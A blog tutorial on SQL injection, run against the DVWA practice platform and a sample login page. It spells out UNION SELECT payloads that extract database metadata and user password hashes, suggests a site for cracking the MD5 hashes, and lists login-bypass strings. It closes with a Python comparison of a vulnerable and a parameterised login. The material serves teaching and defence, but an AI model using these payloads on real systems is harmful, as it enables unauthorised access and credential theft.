Detailed process and explanation of SQL injection experiment

1. Introduction to SQL Injection

A SQL injection attack inserts malicious SQL queries or additional statements into an application's input parameters so that they are parsed and executed by the backend SQL server. It is currently one of the most common means hackers use to attack databases.

2. Three-tier architecture of Web program

Three-tier architecture (3-tier architecture) usually divides the entire business application into:

  • User interface layer

  • Business logic layer

  • Data access layer

The purpose of separating the layers is the idea of "high cohesion, low coupling". In software architecture design, the layered structure is the most common and important structure and is used in many kinds of software development.

2.2. Database Web three-tier architecture

Because database-driven Web applications follow the three-tier idea, they are also divided into three layers:

  • Presentation layer

  • Business logic layer (also called domain layer)

  • Data access layer (also called storage layer)

3. Detailed explanation of SQL injection vulnerabilities

3.2 Causes and threats of SQL injection:

As mentioned above, when we access a dynamic web page, the web server sends a SQL query request to the data access layer; if permission verification passes, the SQL statement is executed.
SQL requests issued directly from within the website are generally not dangerous, but in practice it is often necessary to construct SQL statements dynamically from the user's input. If the user's input is crafted as malicious SQL code and the web application does not examine the parameters used in the dynamically constructed SQL statement, unexpected dangers arise.

The threats brought by SQL injection mainly include the following points:

  • Guessing the backend database structure is the most commonly used way to steal sensitive information from websites.
  • Bypassing authentication, such as bypassing verification to log into the website backend.
  • Injection can use database stored procedures to perform privilege escalation and other operations.

4. SQL injection example 1. Guess the database pass

Let's take an example to give you a clearer understanding of how SQL injection occurs in the database.

One thing to note here: the injection experiment must be conducted in an experimental environment. SQL injection must not be performed on domestic websites, otherwise the police will come to your door, so be careful not to break the law.

Use the DVWA penetration testing platform as the target of attack testing:

Enter "1" in the user ID field and check the echo (user ID = 1, indicating that the PHP page passes parameters through the GET method):

Click to view the source code; here we can see the source of the SQL injection.

The SQL query code is:

As you can see, the actual executed SQL statement is:

SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;'

The meaning of this statement is to query the data whose user_id is 1 in the users table and order it by the first field.

It can be seen that the query selects only two fields from the users table, so the result has two columns.

Next we use a UNION SELECT joint query to obtain more information.
The UNION operator combines the result sets of two or more SELECT statements into one result set for display, that is, it performs a union query. Note that in a UNION query the number of columns must be the same as in the main query. We already know that the main query has 2 columns, so the rest is easy to handle.
Enter 1' union select database(),user()# to query:

  • database() will return the database name used by the current website.
  • user() will return the username executing the current query.

In fact, the actual SQL statement executed is:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user()#

From the information returned (the screenshot above), we successfully obtained:

  • The current database used by the website is dvwa.
  • The user name currently executing the query is root@localhost.

In the same way, we enter 1' union select version(),@@version_compile_os# to query:

  • version() gets the current database version.
  • @@version_compile_os gets the current operating system.

SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#

From the information returned (the screenshot above), we successfully obtained:

  • The current database version is: 5.6.31-0ubuntu0.15.10.1.
  • The current operating system is: debian-linux-gnu

Next we try to get the table names in the dvwa database.
information_schema is a database that comes with MySQL. It saves the information of all databases on the MySQL server, such as database names, tables, column data types and access rights. This database has a table named tables, which contains the two fields table_name and table_schema, recording respectively the name of each table stored in the DBMS and the database in which that table is located.

We enter 1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'# to query:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#

The dvwa database has two data tables, namely guestbook and users.

If we are not satisfied with the information obtained so far, we can try to obtain the account names and passwords next.

The users table has the fields user and password, so enter 1' union select user,password from users# to query:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#

You can see that the usernames and passwords were successfully exposed. The passwords are stored as MD5 hashes, which can be looked up at http://www.cmd5.com . Now you should have some understanding of SQL injection, and also understand its power, right? So, as I said before, be aware that experiments are experiments, but don't break the law.

4.2 SQL injection example 2. Bypassing verification

Examples of using SQL vulnerabilities to bypass login verification

Use a pre-written page, which is a normal login page: entering the correct username and password logs in successfully.

If the login fails, we find that the error page gives away no information.

When the query finds a row in the data table matching both the username and password fields, a successful login is returned.
Following the idea of the first example, we try entering 123' or 1=1 # as the username and 123' or 1=1 # as the password as well:

Why can I log in successfully? Because the actual executed statement is:

select * from users where username='123' or 1=1 #' and password='123' or 1=1 #'

According to MySQL syntax, the content after # is ignored, so the above statement is equivalent to (in fact, it is the same if you enter nothing in the password box):

select * from users where username='123' or 1=1

Since the condition or 1=1 is always true, the result is of course true and the login succeeds.
Let's try not using # to comment out the single quote, and instead close it manually:
we enter the username 123' or '1'='1 and similarly the password 123' or '1'='1 (the single quotes cannot be omitted, otherwise there will be a syntax error)

The actual SQL statement executed is:

select * from users where username='123' or '1'='1' and password='123' or '1'='1

The two OR conditions make the preceding comparisons always evaluate to true, so the login succeeds.

There are many other MySQL statements that can cleverly bypass verification; try thinking up your own.
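As an added example (not the page's login page), here is the manual-closing bypass above replayed against a constructed SQLite users table, beside a hardened login that binds the username as a parameter and verifies the password in application code with a constant-time comparison. The names login_vulnerable and login_safe and the sample row are assumptions; the toy stores the password in plaintext only to mirror the page's login, whereas a real deployment would store a salted slow hash.

```python
import hmac
import sqlite3

# Constructed sample row mirroring the page's login table. The password is kept in
# plaintext only because the page's login compares it directly in SQL; a real system
# would store a salted, slow hash (e.g. bcrypt) and compare hashes instead.
SAMPLE_USERS = [("admin", "password")]


def make_db():
    """In-memory SQLite stand-in for the MySQL table behind the login page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The page's login: both fields are spliced into the WHERE clause and 'any row
    returned' counts as success, so an input that closes the quote and appends
    or '1'='1 makes the condition true for every row."""
    query = (f"select * from users where username='{username}' "
             f"and password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Hardened form: the username is bound as a parameter, so it can only ever be
    a value to compare against, and the password check happens in code, not in SQL."""
    row = conn.execute("select password from users where username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    # compare_digest avoids leaking how many leading characters matched via timing.
    return hmac.compare_digest(row[0], password)


def demo():
    conn = make_db()
    payload = "123' or '1'='1"   # the page's manual-closing payload
    return {
        "vulnerable_bypass": login_vulnerable(conn, payload, payload),  # True
        "vulnerable_wrong": login_vulnerable(conn, "admin", "wrong"),   # False
        "safe_bypass": login_safe(conn, payload, payload),              # False
        "safe_correct": login_safe(conn, "admin", "password"),          # True
        "safe_wrong": login_safe(conn, "admin", "wrong"),               # False
    }
```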

Origin blog.csdn.net/2302_78587828/article/details/132270522